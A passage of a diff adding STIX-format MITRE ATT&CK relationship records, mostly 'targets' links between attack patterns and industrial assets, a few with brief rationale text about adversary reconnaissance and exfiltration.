"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bfdb907f-5e50-4949-944a-3dc9cca239ce", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bffad8de-a807-4216-9753-008a87d9d77f", + "created": "2023-09-28T19:56:40.730Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:56:40.730Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0216882-c59f-4658-999a-f3fee6927513", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c034d63b-b2b5-49eb-8b65-c1da6f587f74", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0377d5c-723d-42d0-af21-6eb568c6ae39", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c03a47c3-3983-475e-bbe6-6c4ab3eec9a1", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c047df7c-3ed7-455f-8b13-14ced8e93fef", + "created": "2023-09-28T21:17:47.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:17:47.080Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c04b28a4-36ec-43e1-b32f-64d6451991c6", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c067c7cb-8d5e-4540-b207-76107ccf6b93", + "created": "2024-06-26T14:50:46.144Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:50:46.144Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0681ee6-d8c1-4784-8182-68461fb4799a", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c075f36d-2732-4258-b921-3f07845bc367", + "created": "2020-02-11T18:59:50.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c083b081-6416-4aa5-9a50-079ec29c75ec", + "created": "2024-06-26T14:51:26.964Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:51:26.964Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c096961b-dfbd-4187-932a-7c1d2c9c6b08", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0a7d44c-6601-4c3f-893b-1ca4de4704b6", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0aff964-514e-46ae-ab21-021460225eb9", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0c6b045-2dfc-43cf-988a-2042985c09e5", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0cc71c7-4196-40ac-8f38-5d020f7d93fa", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0cff732-96b0-4176-8889-f817664f847d", + "created": "2024-06-27T09:11:34.078Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:11:34.078Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0d4d741-b4c1-4c2c-bfac-b172410ddabe", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0e1d54c-3f09-4b1c-8f44-d9d774266177", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0e68aed-464d-4ba1-9cd2-3cc9341c668d", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c0ec0cf4-b283-4ec3-864e-83917bed1a46", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c12e72da-89f6-4b4e-883d-0e53f663fddd", + "created": "2024-06-27T09:45:49.620Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:45:49.620Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c13b5c12-5a80-4012-b2d2-6642dd8ccf5c", + "created": "2021-10-05T21:26:15.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c148030d-bbdf-4c8c-97da-0d44e3518aa9", + "created": "2024-05-22T17:26:39.703Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:16:13.639Z", + "description": "Asset Mapping Rationale: Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes.", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1686b93-9729-4423-9d32-c8b3fe46c21e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c185a6ee-4897-49e0-801a-6c050054661f", + "created": "2020-10-01T01:48:15.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1946051-d342-44ce-9956-58c2a97b7e00", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1bf82ae-8a35-4c65-a623-4fc2430f547c", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1c20b2c-0ae0-4ee4-863f-c82624fbcfe1", + "created": "2021-03-30T17:20:05.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1c5f193-6a20-4b6c-91c9-fb066bb73eca", + "created": "2024-05-23T04:10:37.375Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:17:14.260Z", + "description": "Asset Mapping Rationale: Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure.", + "relationship_type": "targets", + "source_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1d77f83-23ec-4128-afd1-ed8ea12281a2", + "created": "2023-09-29T18:09:02.311Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:09:02.311Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c1e051ab-0a11-4d29-b98f-aa442ab69553", + "created": "2023-09-29T17:09:48.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:48.178Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2168fe8-be19-4df5-808e-ed87c9c0e1c5", + "created": "2023-09-29T16:28:39.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:28:39.397Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c224465d-b3fb-4015-b527-30e1482945b4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c228cf10-69fa-4530-92d8-4ba325373523", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c233df49-e450-4151-8a0f-1765faf3d75a", + "created": "2023-09-29T17:08:08.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:08:08.883Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c237f5e1-0dd1-45f4-a7e2-21442fb4a0c7", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": 